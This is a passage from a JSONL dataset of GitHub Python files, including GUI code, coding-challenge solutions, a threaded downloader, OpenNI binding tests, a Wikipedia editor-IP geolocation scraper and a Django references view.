impl_sqla_alarm\nfrom aodh.tests import base as test_base\n\n\nclass CapabilitiesTest(test_base.BaseTestCase):\n def test_alarm_capabilities(self):\n expected_capabilities = {\n 'alarms': {'query': {'simple': True,\n 'complex': True},\n 'history': {'query': {'simple': True,\n 'complex': True}}},\n }\n\n actual_capabilities = impl_sqla_alarm.Connection.get_capabilities()\n self.assertEqual(expected_capabilities, actual_capabilities)\n","repo_name":"openstack/aodh","sub_path":"aodh/tests/functional/storage/test_impl_sqlalchemy.py","file_name":"test_impl_sqlalchemy.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"18149754117","text":"import os\nimport sys\ndef getMoneySpent(keyboards, drives, b):\n keyboards.sort()\n drives.sort()\n key_len = len(keyboards)\n drive_len = len(drives)\n max_spend = 0\n for i in range(key_len):\n for j in range(drive_len):\n if (keyboards[i] + drives[j]) > max_spend and (keyboards[i] + drives[j]) <= b:\n max_spend = keyboards[i] + drives[j]\n if max_spend == 0:\n return -1\n else:\n return max_spend\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n bnm = input().split()\n\n b = int(bnm[0])\n\n n = int(bnm[1])\n\n m = int(bnm[2])\n\n keyboards = list(map(int, input().rstrip().split()))\n\n drives = list(map(int, input().rstrip().split()))\n moneySpent = getMoneySpent(keyboards, drives, b)\n\n fptr.write(str(moneySpent) + '\\n')\n\n fptr.close()\n","repo_name":"Benson1198/31-Days-of-CP","sub_path":"Day 6/Electronics(Hackerrank).py","file_name":"Electronics(Hackerrank).py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31556770571","text":"import mergit.GUIInterfaces as GUI\nimport mergit.Project as Project\nimport pygame as pyg\nimport mergit.Widgets as Widgets\nimport os\n\n'''\n1. GUIController\n'''\n\n\nclass GUIController():\n\n def __init__(self, width, height):\n pyg.font.init()\n self.dialogueBox = Widgets.DisplayMessage()\n self.projectController = Project.ProjectController(self.dialogueBox.sendWarning)\n self._width = width\n self._height = height\n self.width = width\n self.height = height\n\n self._positions = [[0, 0, width, 26], [300, 26, width - 300, height - 26], [0, 26, 300, height - 26]]\n self.positions = [[0, 0, width, 26], [300, 26, width - 300, height - 26], [0, 26, 300, height - 26]]\n\n self.interfaceButtons = GUI.InterfaceButtons(0, 0, width, 26, self.projectController)\n self.interfaceSurface = pyg.Surface((width, 26))\n self.conflictDisplay = GUI.ConflictDisplay(0, 0, width - 300, height - 26, self.projectController)\n self.conflictSurface = pyg.Surface((width - 300, height - 26))\n self.projectDisplay = GUI.ProjectDisplay(0, 0, 300, height - 26, self.projectController)\n self.projectSurface = pyg.Surface((300, height - 26))\n\n self.objects = [self.interfaceButtons, self.conflictDisplay, self.projectDisplay]\n self.surfaces = [self.interfaceSurface, self.conflictSurface, self.projectSurface]\n \n def update(self, mx, my, mb, keys):\n for i in range(len(self.objects)):\n self.objects[i].update(mx-self.positions[i][0], my-self.positions[i][1], mb, keys)\n\n self.projectController.update()\n\n def draw(self, screen):\n for i in range(len(self.objects)):\n self.objects[i].draw(self.surfaces[i])\n screen.blit(self.surfaces[i], (self.positions[i][0], self.positions[i][1]))\n\n def resize(self, newWidth, newHeight, scalex, scaley):\n X = 0\n Y = 1\n WIDTH = 2\n HEIGHT = 3\n\n self.width = newWidth\n self.height = newHeight\n width = self._width\n height = self._height\n scales = []\n\n # Interface Display\n i = 0\n nscalex = newWidth / self._width # scale based off screen size\n nscaley = newHeight / self._height\n self.interfaceSurface = pyg.Surface((self._positions[i][WIDTH] * nscalex, self._positions[i][HEIGHT]))\n scales.append([nscalex, nscaley])\n\n # Conflict Display\n i = 1\n nscalex = newWidth / self._width # scale base of screen size\n nscaley = (newHeight - self._positions[i][Y]) / (self._positions[i][HEIGHT]) # extend screen from starting point to end of the screen\n self.conflictSurface = pyg.Surface((self._positions[i][WIDTH] * nscalex, self._positions[i][HEIGHT] * nscaley))\n scales.append([nscalex, nscaley])\n\n # Project Display\n i = 2\n nscalex = newWidth / self._width # scale base of screen size\n nscaley = (newHeight - self._positions[i][Y]) / (self._positions[i][HEIGHT]) # extend screen from starting point to end of the screen\n self.projectSurface = pyg.Surface((self._positions[i][WIDTH] * nscalex, self._positions[i][HEIGHT] * nscaley))\n scales.append([nscalex, nscaley])\n\n self.surfaces = [self.interfaceSurface, self.conflictSurface, self.projectSurface]\n\n # scale x positions of screens\n for i in range(len(self.positions)):\n self.positions[i][0] = self._positions[i][0] * scales[i][X]\n self.objects[i].resize(scales[i][X], scales[i][Y])\n","repo_name":"Tristhal/MerGit","sub_path":"mergit/GUIController.py","file_name":"GUIController.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25551964269","text":"import tkinter\r\nimport tkinter as tk\r\nfrom tkinter.ttk import *\r\nfrom tkinter import Label,Entry,Radiobutton,StringVar,Button,re,IntVar,Tk,DISABLED,NORMAL,END\r\nfrom MEMBERreg.Model import FormValues\r\nfrom tkcalendar import DateEntry\r\nfrom tkinter import messagebox\r\nfrom tkinter.ttk import *\r\nimport re\r\n\r\nclass MyForm:\r\n no1=\"\"\r\n dt=\"\"\r\n fnm=\"\"\r\n email1=\"\"\r\n dob1=\"\"\r\n v=\"\"\r\n mobno1=\"\"\r\n variable1=\"\"\r\n Ft=\"\"\r\n\r\n def clearScreen(self):\r\n self.no1.delete(0,tk.END)\r\n self.dt.delete(0,tk.END)\r\n self.fnm.delete(0,tk.END)\r\n self.email1.delete(0,tk.END)\r\n self.dob1.delete(0,tk.END)\r\n self.mobno1.delete(0,tk.END)\r\n self.Ft.delete(0,tk.END)\r\n\r\n def sub(self):\r\n no=self.no1.get()\r\n dt1=self.dt.get()\r\n name=self.fnm.get()\r\n email=self.email1.get()\r\n dob=self.dob1.get()\r\n gender=self.v.get()\r\n mobno=self.mobno1.get()\r\n ty=self.variable1.get()\r\n square=self.Ft.get()\r\n\r\n root=\"\"\r\n print(no, \" \", dt1, \" \", name, \" \", email, \" \", dob, \" \", gender, \" \", mobno, \" \", ty, \" \", square)\r\n #self.close()\r\n #ope=operator()\r\n #res=ope.show(no,dt1,name,email,dob,gender,mobno, ty,square)\r\n\r\n\r\n # def close(self):\r\n # self.root.destroy()\r\n MsgBox = tk.messagebox.askokcancel('Registration', 'Are you sure you want to submit form',\r\n icon='warning')\r\n\r\n # if MsgBox == 'yes':\r\n # self.root.destroy()\r\n # else:\r\n # tk.messagebox.showinfo('Return', 'You will now return to the application screen')\r\n #self.root.destroy()\r\n mm = FormValues()\r\n mm.Values(no, dt1, name, email, dob, gender, mobno, ty, square)\r\n s = self.clearScreen()\r\n\r\n def cooun(self):\r\n aa=FormValues()\r\n no = self.no1.get()\r\n bb=aa.cn()\r\n print(bb,\"dfhghjk\")\r\n self.no1.insert(tk.END,bb)\r\n\r\n\r\n def NewForm(self):\r\n self.root =Tk()\r\n self.root.geometry(\"600x600\")\r\n self.root.title(\"Member Registration Form\")\r\n style = Style()\r\n style.configure('r.TLabel', font=('camel', 17, 'bold'), foreground='black')\r\n style.configure(\"wb.TLabel\", font=('camel', 10), foreground=\"black\")\r\n style.configure('g.TButton', font=('camel', 13, 'bold'), foreground='black')\r\n style.configure('f.TEntry', font=('camel', 10, 'bold'), foreground='black')\r\n\r\n ll=Label(self.root,text=\"Member Registration\",style=\"r.TLabel\")\r\n ll.place(x=140,y=35)\r\n\r\n no = Label(self.root, text=\"No\", style=\"wb.TLabel\")\r\n no.place(x=50, y=110)\r\n ob = tkinter.StringVar()\r\n self.no1 = Entry(self.root, textvariable=ob,style=\"f.TEntry\")\r\n self.no1.place(x=130, y=110)\r\n self.no1.insert(0, \"enter R/C no\")\r\n self.no1.configure(state=NORMAL)\r\n\r\n # ff = FormValues()\r\n # a=ff.cn()\r\n # #self.no1.insert(tk.END,a[0][0])\r\n dat = Label(self.root, text=\"Date\",style=\"wb.TLabel\" )\r\n dat.place(x=290, y=110)#\r\n self.dt = Entry(self.root,style=\"f.TEntry\")\r\n self.dt.place(x=340, y=110)\r\n self.dt.insert(0, \"YYYY-MM-DD\")\r\n self.dt.configure(state=NORMAL)\r\n\r\n name = Label(self.root, text=\"Name\",style=\"wb.TLabel\")\r\n name.place(x=50, y=150)\r\n self.fnm = Entry(self.root,style=\"f.TEntry\")\r\n self.fnm.place(x=130, y=150,width=300)\r\n self.fnm.insert(0,\"Please Enter Full Name\")\r\n self.fnm.configure(state=NORMAL)\r\n\r\n email = Label(self.root, text=\"Email\",style=\"wb.TLabel\")\r\n email.place(x=50, y=190)\r\n self.email1 = Entry(self.root,style=\"f.TEntry\")\r\n self.email1.place(x=130, y=190,width=300)\r\n self.email1.insert(0, \"email@gmail.com\")\r\n self.email1.configure(state=NORMAL)\r\n #\r\n dob = Label(self.root, text=\"DOB\", style=\"wb.TLabel\")\r\n dob.place(x=50, y=230)\r\n self.dob1 =Entry(self.root)#,pattern=\"yyyy-mm-dd\")\r\n self.dob1.place(x=130, y=230)\r\n\r\n mobno = Label(self.root, text=\"Mobno\", width=20,style=\"wb.TLabel\")\r\n mobno.place(x=50, y=270)\r\n self.mobno1 = Entry(self.root,style=\"f.TEntry\")\r\n self.mobno1.place(x=130, y=270)\r\n\r\n Ty = Label(self.root, text=\"Type\",style=\"wb.TLabel\")\r\n Ty.place(x=50, y=310)\r\n\r\n OptionList = [\"Select\",\r\n \"Residential\",\r\n \"Commercial\"\r\n ]\r\n self.variable1 = tkinter.StringVar(self.root)\r\n self.variable1.set(OptionList[0])\r\n opl = tkinter.OptionMenu(self.root, self.variable1, *OptionList)\r\n opl.config(width=8, font=('Helvetica', 12))\r\n opl.place(x=130, y=310)\r\n\r\n sq = Label(self.root, text=\"Sq/Ft\", width=20, style=\"wb.TLabel\")\r\n sq.place(x=50, y=370)\r\n self.Ft = Entry(self.root,style=\"f.TEntry\")\r\n self.Ft.place(x=130, y=370)\r\n\r\n self.v = tkinter.StringVar()\r\n tk=Label(self.root, text=\"Gender\",style=\"wb.TLabel\")\r\n tk.place(x=50, y=420)\r\n tk=Radiobutton(self.root, text=\"male\", variable=self.v, value=\"male\")\r\n tk.place(x=130, y=420)\r\n tk=Radiobutton(self.root, text=\"female\", variable=self.v, value=\"female\")\r\n tk.place(x=200, y=420)\r\n\r\n CheckVar1 = IntVar()\r\n C1 = Checkbutton(self.root, text=\"Accept Terms and Conditions\", variable=CheckVar1,onvalue=1, offvalue=0)\r\n C1.place(x=50,y=460)\r\n Button(self.root, text='Register', command=self.sub,style = 'g.TButton').place(x=180, y=510)\r\n\r\n def on_click(event):\r\n self.no1.configure(state=NORMAL)\r\n self.no1.delete(0,END)\r\n\r\n def on_click1(event):\r\n self.dt.configure(state=NORMAL)\r\n self.dt.delete(0, END)\r\n\r\n def on_click2(event):\r\n self.fnm.configure(state=NORMAL)\r\n self.fnm.delete(0,END)\r\n\r\n def on_click3(event):\r\n self.email1.configure(state=NORMAL)\r\n self.email1.delete(0, END)\r\n\r\n # make the callback only work once\r\n\r\n # self.no1.unbind('',self. on_click_id)\r\n\r\n self.on_click_id = self.no1.bind( '',on_click)\r\n self.on_click_id = self.dt.bind('', on_click1)\r\n self.on_click_id = self.fnm.bind('', on_click2)\r\n self.on_click_id = self.email1.bind('', on_click3)\r\n self.root.mainloop()\r\n","repo_name":"jyotiadate/Smart_Society_Maintenance","sub_path":"MEMBERreg/RegisterForm.py","file_name":"RegisterForm.py","file_ext":"py","file_size_in_byte":6846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21343989309","text":"import os\nimport threading\nimport urllib.request\nimport time\n\nfrom time import sleep\nfrom datetime import datetime, timedelta\nfrom multiprocessing import Queue\n\n\nqueue_lock = threading.Lock()\nqueue = Queue()\n\n\nclass DownloadWorker(threading.Thread):\n \"\"\"Worker for downloading data from URL:\n\n queue - array of URLs for download\n queue_lock - threading Lock object\n BANDWIDTH - stream rate, byte/s\n \"\"\"\n\n def __init__(self, queue, queue_lock, BANDWIDTH):\n super(DownloadWorker, self).__init__()\n self.queue = queue\n self.queue_lock = queue_lock\n self.BANDWIDTH = BANDWIDTH\n\n def run(self):\n while True:\n nexturl = self.grab_next_url()\n if nexturl is None:\n break\n self.download_file(nexturl[0], nexturl[1], self.BANDWIDTH)\n\n def grab_next_url(self):\n \"\"\"\n Get next url from queue.\n \"\"\"\n self.queue_lock.acquire(1)\n if queue.empty() is True:\n nexturl = None\n else:\n nexturl = queue.get_nowait()\n self.queue_lock.release()\n return nexturl\n\n def download_file(self, file_url, local_filename, BANDWIDTH):\n \"\"\"Downloading data from url to local folder.\n\n file_url - link to download file\n local_filename - filename for local recording\n BANDWIDTH - stream rate, byte/s\n \"\"\"\n global total_size # total size of all downloads\n SECOND = timedelta(seconds=1)\n file = os.path.join(UPLOAD_DIR + '/' + local_filename)\n with urllib.request.urlopen(file_url) as data:\n with open(file, 'wb') as filename:\n for chunk in iter(lambda: data.read(BANDWIDTH), b\"\"):\n last_time = datetime.now() # start time for writing chunk\n filename.write(chunk)\n time_passed = datetime.now() - last_time # time delta\n if time_passed < SECOND: # if have extra time - wait\n time.sleep((SECOND - time_passed).microseconds /\n 1000000.0)\n size = os.path.getsize(file)\n total_size += size\n\n\ndef main(urls_list, threads_count, total_BANDWIDTH):\n \"\"\"Main process for downloading data from URL-addresses.\n Reads a file and adds links in queue, init threads:\n\n urls_list - file with array of URLs for download\n threads_count - count of threads/workers\n BANDWIDTH - total stream rate for all threads, byte/s\n \"\"\"\n print('\\n' + '-' * 100 + '\\nSTARTED\\n' + '-' * 100 + '\\n\\n')\n start = time.time() # starting process time\n with open(urls_list) as links:\n for url in links:\n queue.put(url.rstrip().split(' '))\n\n BANDWIDTH = total_BANDWIDTH // threads_count # rate for a single stream\n for i in range(threads_count):\n thread = DownloadWorker(queue, queue_lock, BANDWIDTH)\n thread.start()\n while threading.active_count() > 2:\n time.sleep(1)\n\n print('-' * 100 + '\\nFINISHED:\\n')\n end = time.time() # ending process time\n print('Summary downloading size : ' +\n '%.1f mb (%s bytes)' % ((total_size / 1000000), total_size))\n print('Total downloading time: ' + '%.2f seconds\\n' % (end - start) + \\\n '-' * 100 + '\\n')\n\n\nif __name__ == '__main__':\n\n from settings import threads_count, urls_list, upload_folder, \\\n total_BANDWIDTH, total_size, UPLOAD_DIR\n\n main(urls_list, threads_count, total_BANDWIDTH)\n","repo_name":"woobinda/console-downloader","sub_path":"console-utility/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15800948338","text":"import random\nimport time\nimport numpy\nimport pygame\nimport copy\nfrom pygame.locals import *\n\nfrom GlobalFunctions import *\n\nclass Particle:\n position = [0, 0]\n size = 0\n decrease_ratio = 0.0\n left_time = 0\n def __init__(self, position, size = 1, life_time = 120):\n self.position = position\n if position[0] < 0:\n self.position[0] = 0\n\n if position[1] < 0:\n self.position[1] = 0\n self.size = size\n self.decrease_ratio = size / life_time\n self.left_time = life_time\n\n def updateParticle(self):\n self.left_time -= 1\n self.size -= self.decrease_ratio\n\n def renderParticle(self, screen):\n pygame.draw.rect(\n screen,\n (\n 97 + random.randint(-10, 10),\n 222 + random.randint(-10, 10),\n 42 + random.randint(-10, 10)\n ),\n pygame.Rect(self.position[0], self.position[1], self.size, self.size))\n\n def visible(self):\n if self.size > 0:\n return True\n else:\n return False\n\n","repo_name":"Cezary-Androsiuk/Simple_Villager_Defence_game_python_pygame","sub_path":"Particle.py","file_name":"Particle.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1592145137","text":"# understanding the use of next and enumerate in this context\n\ndata = 'bvwbjplbgvbhsrlpgdmjqwftvncz'\n\n# print(next(i for i,c in enumerate(data) if len(set(data[i-4:i]))==4))\n\n# It appears that this is essentially a for loop that \"loops\" through the data until if finds\n# four unique letters. \"next\" keeps the loop going. enumerate returns an index (i) and a \n# value (c). i is used to index the data and is eventually returned as the answer.\n\n\nlist1 = [1,2,3,4,5]\nl_list = enumerate(list1)\nprint(next(l_list))\n\nlist2 = ['a','b','c','d']\nfor count, value in enumerate(list2,start=1):\n print(count, value)\n\ndef even_items(iterable):\n values = []\n for index, value in enumerate(iterable, start=1):\n if not index % 2:\n values.append(value)\n return values\n\n# The following three lines of code all out put ['b', 'd']\nprint(even_items(list2))\nprint([v for i,v in enumerate(list2,start=1) if not i % 2])\nprint(list2[1::2])\n\na = list2[1::2]\nprint(a)\n\n\n","repo_name":"n7tms/AOC","sub_path":"AOC2022/202206.z.py","file_name":"202206.z.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70873343849","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\n\n\na=pd.read_csv('train2.csv')\ncolumns1 = ['perX',\t'perY',\t'topLeftX',\t'topLeftY',\t'botRightX','botRightY','matchedIndex']\nlabeledOutcome = a['timePress']\nm = len(labeledOutcome)\npredictors = pd.DataFrame(a, columns=columns1)\n# predictors1 = pd.DataFrame(a, columns=columns1,np.ones(m))\nlabeledOutcome = a['timePress']\nmodel = LinearRegression()\nmodel.fit(predictors, labeledOutcome)\n\ni = 0\nmeanSq = []\nfor i in range(60):\n oneOff = a[columns1][i:i+1]\n target = a['timePress'][i]\n # model.fit(predictors, target)\n yfit = model.predict(oneOff)\n meanSq.append((yfit[0]-target)* (yfit[0]-target))\n# print (np.sqrt(np.mean(meanSq)))\n#\n# personX = a['perX'].values\n# personY = a['perY'].values\n# topLeftX = a['topLeftX'].values\n# topLeftY = a['topLeftY'].values\n# botRightX = a['botRightX'].values\n# botRightY = a['botRightY'].values\n# matchedIndex = a['matchedIndex'].values\n# m = len(matchedIndex)\n# bias = np.ones(m)\n# X = np.array([bias, personX, personY,topLeftX,topLeftY,botRightX,botRightY,matchedIndex]).T\n#\n# B = np.array([0, 0, 0])\n# Y = np.array(write)\n","repo_name":"Crolabear/jump_jump","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34055479329","text":"import unittest\nimport subprocess\nimport os\nimport primesense\nimport inspect\nimport tokenize\nimport logging\nimport ConfigParser\nfrom io import StringIO\nfrom cbinder.generator import delimiters\n\nconfig = ConfigParser.ConfigParser()\nconfig.read(\"../bin/sources.ini\")\n\n\nclass TestBindings(unittest.TestCase):\n GEN_DIR = primesense.__path__[0]\n GEN_ONI = os.path.join(GEN_DIR, \"_openni2.py\")\n GEN_NITE = os.path.join(GEN_DIR, \"_nite2.py\")\n\n def test_openni2_bindings(self):\n if os.path.exists(self.GEN_ONI):\n os.unlink(self.GEN_ONI)\n subprocess.check_call([\"python\", \"../bin/build_openni.py\"])\n self.assertTrue(os.path.exists(self.GEN_ONI))\n \n from primesense import _openni2\n from primesense import openni2\n \n openni2.initialize()\n ver = openni2.get_version()\n openni2.unload()\n\n self.assertEqual(ver.major, openni2.c_api.ONI_VERSION_MAJOR)\n self.assertEqual(ver.minor, openni2.c_api.ONI_VERSION_MINOR)\n\n h_file = os.path.join(config.get(\"headers\", \"openni_include_dir\"), \"OpenNI.h\")\n\n self.check_unexposed_functions(openni2, _openni2, h_file, [\"oniGetExtendedError\"])\n self.check_missing_names_by_prefix(openni2, h_file, \"DEVICE_PROPERTY_\", \"ONI_\")\n self.check_missing_names_by_prefix(openni2, h_file, \"STREAM_PROPERTY_\", \"ONI_\")\n \n\n def _get_identifiers(self, mod):\n source = inspect.getsource(mod)\n g = tokenize.generate_tokens(StringIO(unicode(source)).readline)\n return set(tokval for toktype, tokval, _, _, _ in g if toktype == tokenize.NAME)\n \n def _get_unexposed_functions(self, wrapper_mod, autgen_mod):\n identifiers = self._get_identifiers(wrapper_mod)\n for func in autgen_mod.all_funcs:\n if func.__name__ not in identifiers:\n yield func.__name__\n \n def check_unexposed_functions(self, wrapper_mod, autgen_mod, hfile, to_ignore = []):\n hfile_tokens = set(delimiters.split(open(hfile, \"r\").read()))\n fail = False\n for func in self._get_unexposed_functions(wrapper_mod, autgen_mod):\n if func in to_ignore:\n continue\n if func in hfile_tokens:\n fail = True\n logging.error(\"%s is not exposed by wrapper <<< FIX ME\", func)\n else:\n logging.warning(\"%s is missing from wrapper (not exposed in %s either)\", func, os.path.basename(hfile))\n \n if fail:\n self.fail(\"Found unexposed API function\")\n \n def check_missing_names_by_prefix(self, wrapper_mod, hfile, prefix, pyprefix):\n identifiers = self._get_identifiers(wrapper_mod)\n hfile_tokens = set(delimiters.split(open(hfile, \"r\").read()))\n \n fail = False\n for tok in hfile_tokens:\n if tok.startswith(prefix):\n pytok = pyprefix + tok\n if pytok not in identifiers:\n logging.error(\"%s is missing\", pytok)\n fail = True\n\n if fail:\n self.fail(\"Found unexposed properties\")\n \n def test_nite_bindings(self):\n if os.path.exists(self.GEN_ONI):\n os.unlink(self.GEN_ONI)\n subprocess.check_call([\"python\", \"../bin/build_openni.py\"])\n self.assertTrue(os.path.exists(self.GEN_ONI))\n\n if os.path.exists(self.GEN_NITE):\n os.unlink(self.GEN_NITE)\n subprocess.check_call([\"python\", \"../bin/build_nite.py\"])\n self.assertTrue(os.path.exists(self.GEN_NITE))\n\n from primesense import _nite2\n from primesense import nite2\n\n nite2.initialize()\n ver = nite2.get_version()\n nite2.unload()\n\n self.assertEqual(ver.major, nite2.c_api.NITE_VERSION_MAJOR)\n self.assertEqual(ver.minor, nite2.c_api.NITE_VERSION_MINOR)\n\n h_file = os.path.join(config.get(\"headers\", \"nite_include_dir\"), \"NiTE.h\")\n self.check_unexposed_functions(nite2, _nite2, h_file)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","repo_name":"tomerfiliba/PrimeSense","sub_path":"tests/test_bindings.py","file_name":"test_bindings.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"38904252709","text":"#chapter1 problem 6\r\n\r\ndef compress(astring, checkCapital=True):\r\n size = len(astring)\r\n\r\n count = 1\r\n highest_count = 2\r\n \r\n if not checkCapital:\r\n astring.lower()\r\n\r\n\r\n #cs = compressedstring\r\n cs = ''\r\n for i in range(0, size):\r\n current = astring[i]\r\n next = None\r\n #check if it's the last:\r\n if i == size - 1:\r\n cs += current + str(count)\r\n \r\n elif i + 1 < size:\r\n next = astring[i+1]\r\n if next == current:\r\n count += 1\r\n \r\n\r\n else:\r\n cs += current + str(count)\r\n count = 1\r\n else:\r\n print('else clause: for loop: compress(astring)')\r\n \r\n if len(cs) >= len(astring):\r\n return astring\r\n else:\r\n return cs\r\n \r\n\r\ndef test():\r\n TEST1 = 'aaabbbcdddeefffff'\r\n expected1 = 'a3b3c1d3e2f5'\r\n result1 = compress(TEST1)\r\n print(result1 == expected1)\r\n TEST2 = 'abbcdefghij'\r\n result2 = compress(TEST2)\r\n print(TEST2 == result2)\r\n TEST3 = 'AaaBbBcDeFffffGGGg'\r\n #wrong_result = 'A1a2B1b1B1c1D1e1F1f4G3g1'\r\n result = compress(TEST3, True)\r\n print(result == TEST3)\r\n TEST4 = compress(TEST3, True)\r\n print(TEST4 == TEST3)\r\n\r\ntest()\r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"nelliesnoodles/CrackingTheCodePython","sub_path":"CCinterview_chapter1/ch1_6.py","file_name":"ch1_6.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31724158616","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open('requirements.txt') as f:\n required = f.read().splitlines()\n\nsetuptools.setup(\n name=\"pygerbil\",\n version=\"0.0.1\",\n author=\"Rungsiman Nararatwong\",\n author_email=\"rungsiman@me.com\",\n description=\"A Python wrapper of GERBIL\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=required,\n url=\"https://github.com/rungsiman/pygerbil\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"rungsiman/pygerbil","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24430893317","text":"class Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n \n # Takes more gas to do a revolution than there is in the stations\n if sum(cost) > sum(gas):\n return -1\n \n n = len(gas)\n startingIndex = 0\n while startingIndex < n:\n # Attempts to compelete a trip around the stations\n currentGasLevel = 0\n for i in range(n):\n j = (i + startingIndex) % n\n currentGasLevel += gas[j] # Fill up at station j\n \n currentGasLevel -= cost[j] # Cost to get to station (j+1)\n \n # Can the car the make it to the next station\n if currentGasLevel < 0:\n startingIndex = j + 1\n break\n \n else:\n # Only executed if it made a full revolution\n return startingIndex\n \n # Returns if there is no valid index\n return -1","repo_name":"devenperez/leetcode","sub_path":"134-gas-station/134-gas-station.py","file_name":"134-gas-station.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1511905064","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nimport datetime\nimport random\nimport re\nimport json\n\n\nrandom.seed(datetime.datetime.now())\n\n\n# 获得相关界面的url\ndef getLinks(articleUrl):\n html = urlopen(articleUrl)\n bsObj = BeautifulSoup(html, 'lxml')\n return bsObj.find('div', {'id': 'bodyContent'}).findAll('a', href=re.compile('^(/wiki/)((?!:).)*$'))\n\n\n# 通过wiki历史编辑记录界面提取出匿名编辑者ip\ndef getHistoryIPs(pageUrl):\n pageUrl = pageUrl.replace('/wiki/', '')\n historyURL = 'http://en.wikipedia.org/w/index.php?title=' + pageUrl + '&action=history'\n print('history url:' + historyURL)\n html = urlopen(historyURL)\n bsObj = BeautifulSoup(html, 'lxml')\n ipAddresses = bsObj.findAll('a', {'class': 'mw-userlink mw-anonuserlink'})\n addressList = set()\n for ipAddress in ipAddresses:\n addressList.add(ipAddress.get_text())\n return addressList\n\n\n# 通过调用freegeoip的api来获得对应的国家地区城市\ndef getCountry(ipAddress):\n try:\n response = urlopen('http://freegeoip.net/json/' + ipAddress).read().decode('utf-8')\n except HTTPError:\n return None\n responseJson = json.loads(response)\n return [responseJson.get('country_name'), responseJson.get('region_name'), responseJson.get('city')]\n\n# 爬取开始的界面\nlinks = getLinks('http://en.wikipedia.org/wiki/Python_(programming_language)')\n\n# 直到没有东西可爬取才借书\nwhile len(links) > 0:\n for link in links:\n print('----------------')\n historyIPs = getHistoryIPs(link.attrs['href'])\n for historyIP in historyIPs:\n country = getCountry(historyIP)\n if country is not None:\n print(historyIP + ' is from ' + country[0] + ', ' + country[1] + ', ' + country[2])\n\n newLink = links[random.randint(0, len(links) - 1)].attrs['href']\n links = getLinks(newLink)\n","repo_name":"Patrickctyyx/WebScrapers","sub_path":"10.14 获得wiki编辑者地区.py","file_name":"10.14 获得wiki编辑者地区.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70235015528","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.db.models import Prefetch\nfrom django.http import Http404, HttpResponse\nfrom django.http.request import HttpRequest\nfrom django.shortcuts import get_object_or_404\nfrom django.template.defaultfilters import wordwrap\nfrom django.template.response import TemplateResponse\nfrom django.utils import timezone\nfrom django.views.decorators.cache import cache_control, never_cache\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.common import CampId\nfrom cciw.utils.views import for_htmx\n\nfrom ...applications import (\n applications_for_camp,\n)\nfrom ...email import (\n make_ref_form_url,\n send_nag_by_officer,\n send_reference_request_email,\n)\nfrom ...forms import (\n AdminReferenceForm,\n CorrectRefereeDetailsForm,\n SendNagByOfficerForm,\n SendReferenceRequestForm,\n)\nfrom ...models import (\n Referee,\n Reference,\n ReferenceAction,\n add_previous_references,\n get_previous_references,\n)\nfrom ..referees import get_initial_reference_form\nfrom ..utils.auth import (\n camp_admin_required,\n)\nfrom ..utils.breadcrumbs import leaders_breadcrumbs, with_breadcrumbs\nfrom ..utils.campid import get_camp_or_404\nfrom ..utils.htmx import add_hx_trigger_header\n\n\n@staff_member_required\n@camp_admin_required # we don't care which camp they are admin for.\n@never_cache\n@with_breadcrumbs(leaders_breadcrumbs)\n@for_htmx(use_block_from_params=True)\ndef manage_references(request, camp_id: CampId):\n # If referee_id is set, we just want to update part of the page.\n referee_id = request.GET.get(\"referee_id\")\n officer = None\n officer_id = request.GET.get(\"officer_id\")\n if officer_id is not None:\n try:\n officer = User.objects.get(id=int(officer_id))\n except (ValueError, User.DoesNotExist):\n raise Http404\n camp = get_camp_or_404(camp_id)\n\n if referee_id is None:\n apps = applications_for_camp(camp, officer_ids=[officer_id] if officer is not None else None)\n app_ids = [app.id for app in apps]\n referees = Referee.objects.filter(application__in=app_ids).order_by()\n else:\n referees = Referee.objects.filter(pk=referee_id).order_by()\n\n 